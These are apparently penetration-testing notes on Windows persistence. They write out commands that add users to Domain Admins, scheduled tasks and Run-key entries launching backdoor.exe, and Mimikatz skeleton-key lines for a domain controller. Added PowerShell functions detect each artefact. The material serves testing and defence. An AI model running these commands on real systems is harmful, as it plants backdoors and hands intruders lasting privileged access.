Infrastructure penetration testing notes
Windows

Last updated 4 years ago

Guides

3 good guides:

Add User

Commands:

net user "username" "password" /ADD

net group "Domain Admins" %username% /DOMAIN /ADD

Change user password

net user USERNAME *

Using Powershell:

Add-LocalGroupMember -Group Administrators -Member hacker
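The account and group changes made by the commands above leave Security-log events behind. The following PowerShell function is an added example (not part of the original notes) that collects them; the function name and the 24-hour default window are my own choices, the event IDs are the documented Microsoft ones.

```powershell
function Get-AccountChangeEvents {
    <# Added example (not from the original notes). Pulls the Security-log events
       that "net user /ADD", "net group ... /ADD" and Add-LocalGroupMember generate,
       so a reviewer can see who created which account or added whom to which group.
       Event IDs (documented by Microsoft):
         4720 - a user account was created
         4728 - a member was added to a security-enabled global group (e.g. Domain Admins)
         4732 - a member was added to a security-enabled local group (e.g. Administrators)
       Needs an elevated shell and the "User Account Management" /
       "Security Group Management" audit subcategories enabled. #>
    [CmdletBinding()]
    param([int]$Hours = 24)

    $filter = @{ LogName = 'Security'; Id = 4720, 4728, 4732; StartTime = (Get-Date).AddHours(-$Hours) }

    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # The useful fields live in EventData; read them out of the event XML.
        $data = @{}
        foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        if ($_.Id -eq 4720) {
            $target = $data['TargetUserName']   # the newly created account
            $group  = $null
        } else {
            $target = $data['MemberName']       # DN of the added member (SID if unresolved)
            $group  = $data['TargetUserName']   # the group it was added to
        }

        [pscustomobject]@{
            Time    = $_.TimeCreated
            EventId = $_.Id
            Actor   = '{0}\{1}' -f $data['SubjectDomainName'], $data['SubjectUserName']
            Target  = $target
            Group   = $group
        }
    } | Sort-Object Time
}

# Usage: last 24 hours of account creations and group additions on this host
Get-AccountChangeEvents -Hours 24 | Format-Table -AutoSize
```

On a domain controller the same query (with 4728 for Domain Admins) covers the `/DOMAIN /ADD` command; on a member server it is 4732 that records the local Administrators addition.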

Scheduled task

SharPersist

Create a Scheduled task:

execute-assembly ~/Downloads/SharPersist.exe -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c echo 123 >> c:\123.txt" -n "Some Task" -m add -o hourly

Or

SharPersist -t schtask -c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" -a "C:\Users\John\msbuild.csproj" -n "Test" -m add -o hourly

Delete a Scheduled task:

SharPersist -t schtask -n "Test" -m remove

PowerShell

PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe" 
PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta" 
PS C:\> $P = New-ScheduledTaskPrincipal "Rasta" 
PS C:\> $S = New-ScheduledTaskSettingsSet 
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S 
PS C:\> Register-ScheduledTask Backdoor -InputObject $D 

Command Line

shell schtasks /create /tn Test /tr "c:\windows\system32\cmd.exe /c c:\Users\JOHN\Downloads\backdoor.exe" /sc onlogon /ru System
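From the defender's side, all three task variants above (SharPersist, `Register-ScheduledTask`, `schtasks /create`) end up as a task whose action runs `cmd.exe` or `Msbuild.exe` with arguments pointing into a user profile. The function below is an added example (not from the original notes or from SharPersist) that enumerates non-Microsoft tasks and flags that pattern; the function name, the directory and interpreter lists are my own assumptions.

```powershell
function Get-SuspiciousScheduledTasks {
    <# Added example (not from the original notes). Walks every non-Microsoft
       scheduled task and flags actions that run from a user-writable location
       (profile, Temp, AppData, ProgramData) or start a command interpreter /
       build tool, which is how the tasks created above look to a reviewer:
       cmd.exe /c ...\Downloads\backdoor.exe, or Msbuild.exe given a user .csproj.
       Run in an elevated shell; Get-ScheduledTask needs Windows 8 / 2012 or later. #>
    [CmdletBinding()]
    param()

    # Assumed heuristics: paths a normal user can write to, and LOLBin-style launchers.
    $writableDirs = '\\Users\\|\\Temp\\|\\AppData\\|\\ProgramData\\|\\Public\\'
    $interpreters = '(^|\\)(cmd|powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32|msbuild)\.exe\b'

    Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft\*' } | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions have no Execute member
            $cmd = [Environment]::ExpandEnvironmentVariables(("$($action.Execute) $($action.Arguments)").Trim())

            [pscustomobject]@{
                TaskName   = $task.TaskName
                TaskPath   = $task.TaskPath
                RunAs      = $task.Principal.UserId
                Triggers   = ($task.Triggers | ForEach-Object { $_.CimClass.CimClassName -replace '^MSFT_Task', '' }) -join ','
                Command    = $cmd
                Suspicious = ($cmd -match $writableDirs) -or ($cmd -match $interpreters)
            }
        }
    } | Where-Object Suspicious | Sort-Object TaskPath, TaskName
}

# Usage: review the flagged tasks; expect a few legitimate ones (updaters, dev tooling)
Get-SuspiciousScheduledTasks | Format-Table TaskName, RunAs, Triggers, Command -AutoSize -Wrap
```

The `Triggers` column shows `LogonTrigger` for the `-AtLogOn` / `/sc onlogon` tasks and `TimeTrigger` for the SharPersist `-o hourly` one, which makes the "runs as SYSTEM at logon from a Downloads folder" combination easy to spot.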

Registry Key

SharPersist:

Create a Registry Key:

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add

Delete a Registry Key:

SharPersist -t reg -k "hkcurun" -v "Test Stuff" -m remove

Command Line

shell reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Test /t REG_SZ /d "C:\Windows\System32\cmd.exe"

Delete:

reg delete Registry_key_path /v Registry_value_name
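To review the Run keys that the `reg add` and `SharPersist -t reg -k hkcurun` commands above write to, here is an added example (not from the original notes or from SharPersist) that lists every autorun value on the host and flags the ones that launch from a user-writable path or start an interpreter such as `cmd.exe`; the function name and the heuristic patterns are my own assumptions.

```powershell
function Get-RunKeyEntries {
    <# Added example (not from the original notes). Enumerates the autorun
       registry keys that "reg add ...\CurrentVersion\Run" and
       "SharPersist -t reg -k hkcurun" write to: HKLM and every loaded user hive
       (so other users' HKCU entries are covered too), in both the native and the
       WOW6432Node views, Run and RunOnce. Values are flagged when they launch
       something from a user-writable path or start an interpreter, which is
       exactly what the "Test" value registered above (cmd.exe) does. #>
    [CmdletBinding()]
    param()

    $subKeys = 'Software\Microsoft\Windows\CurrentVersion\Run',
               'Software\Microsoft\Windows\CurrentVersion\RunOnce',
               'Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
               'Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
    # HKLM plus every hive currently loaded under HKEY_USERS (needs elevation to read them all)
    $roots = @('HKLM:') + (Get-ChildItem Registry::HKEY_USERS -ErrorAction SilentlyContinue |
                           ForEach-Object { "Registry::$($_.Name)" })
    $providerProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    # Assumed heuristics: paths a normal user can write to, and LOLBin-style launchers.
    $writableDirs = '\\Users\\|\\Temp\\|\\AppData\\|\\ProgramData\\|\\Public\\'
    $interpreters = '(^|\\)(cmd|powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32|msbuild)\.exe\b'

    foreach ($root in $roots) {
        foreach ($sub in $subKeys) {
            $key   = "$root\$sub"
            $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
            if (-not $props) { continue }
            foreach ($p in $props.PSObject.Properties) {
                if ($p.Name -in $providerProps) { continue }   # provider metadata, not registry values
                $cmd = [Environment]::ExpandEnvironmentVariables([string]$p.Value)
                [pscustomobject]@{
                    Key        = $key
                    ValueName  = $p.Name
                    Command    = $cmd
                    Suspicious = ($cmd -match $writableDirs) -or ($cmd -match $interpreters)
                }
            }
        }
    }
}

# Usage: everything, suspicious entries first
Get-RunKeyEntries | Sort-Object Suspicious -Descending | Format-Table -AutoSize -Wrap
```

Reading `HKEY_USERS` instead of only `HKCU:` matters because the value is written into whichever user's hive the command ran under; a review from a different account would otherwise miss it.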

Accessibility Features

The accessibility features provide additional options (on-screen keyboard, magnifier, screen reader, etc.) that help people with disabilities use Windows. This functionality can be abused to achieve persistence on a host where RDP is enabled and Administrator-level privileges have been obtained. The technique either touches the disk (the accessibility binary is replaced) or requires a registry modification to execute a payload stored elsewhere.
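Both variants described above can be checked for on a host. The function below is an added example (not from the original notes or the linked guide); the function name and the list of accessibility binaries are my own assumptions, and the registry location is the documented Image File Execution Options key.

```powershell
function Test-AccessibilityBackdoor {
    <# Added example (not from the original notes). Checks the two variants the
       paragraph above describes for each accessibility binary reachable from the
       logon screen: (1) the file on disk has been replaced (classically with a
       copy of cmd.exe), (2) an Image File Execution Options "Debugger" value
       redirects it to another program without touching the file.
       Run in an elevated shell on the host being reviewed. #>
    [CmdletBinding()]
    param()

    # Assumed list of logon-screen accessibility executables
    $binaries = 'sethc.exe', 'utilman.exe', 'osk.exe', 'magnify.exe', 'narrator.exe', 'displayswitch.exe', 'atbroker.exe'
    $ifeo     = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
    $cmdHash  = (Get-FileHash -Path "$env:SystemRoot\System32\cmd.exe" -Algorithm SHA256).Hash

    foreach ($bin in $binaries) {
        $path = Join-Path "$env:SystemRoot\System32" $bin
        if (-not (Test-Path $path)) { continue }

        $hash = (Get-FileHash -Path $path -Algorithm SHA256).Hash
        # Windows binaries are catalog-signed; Get-AuthenticodeSignature validates
        # catalog signatures on Windows 8 / Server 2012 and later.
        $sig  = Get-AuthenticodeSignature -FilePath $path
        $dbg  = (Get-ItemProperty -Path (Join-Path $ifeo $bin) -Name Debugger -ErrorAction SilentlyContinue).Debugger

        [pscustomobject]@{
            Binary       = $bin
            SignatureOK  = ($sig.Status -eq 'Valid')
            IsCopyOfCmd  = ($hash -eq $cmdHash)
            IfeoDebugger = $dbg
            Suspicious   = ($sig.Status -ne 'Valid') -or ($hash -eq $cmdHash) -or (-not [string]::IsNullOrEmpty($dbg))
        }
    }
}

# Usage: anything with Suspicious = True deserves a look at the file and the IFEO key
Test-AccessibilityBackdoor | Format-Table -AutoSize
```

The signature check alone is not sufficient: a signed Windows binary copied over `sethc.exe` still validates against the catalog, which is why the hash is compared with `cmd.exe` as well. For replacements with other signed binaries, compare the hashes against a known-good host of the same build.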

Silver Tickets

Computers change their account passwords every 30 days, but this is initiated by the client, not by Active Directory. Extract the host computer account hash, set a specific registry key, and you can regain access indefinitely.

Skeleton Key

The method injects itself into LSASS and creates a master password that will work for any account in the domain.

  • The Skeleton Key only works for Kerberos RC4 encryption.

  • The Skeleton Key is a backdoor that runs in memory on the Domain Controller and allows a single password (the skeleton password) to be used to log on to any account.

Run it on a DC using Mimikatz:

privilege::debug
misc::skeleton

https://www.mdsec.co.uk/2019/05/persistence-the-continued-or-prolonged-existence-of-something-part-1-microsoft-office/
https://www.mdsec.co.uk/2019/05/persistence-the-continued-or-prolonged-existence-of-something-part-2-com-hijacking/
https://www.mdsec.co.uk/2019/05/persistence-the-continued-or-prolonged-existence-of-something-part-3-wmi-event-subscription/
https://github.com/fireeye/SharPersist
https://pentestlab.blog/2019/11/13/persistence-accessibility-features/
https://pentestlab.blog/2018/04/10/skeleton-key/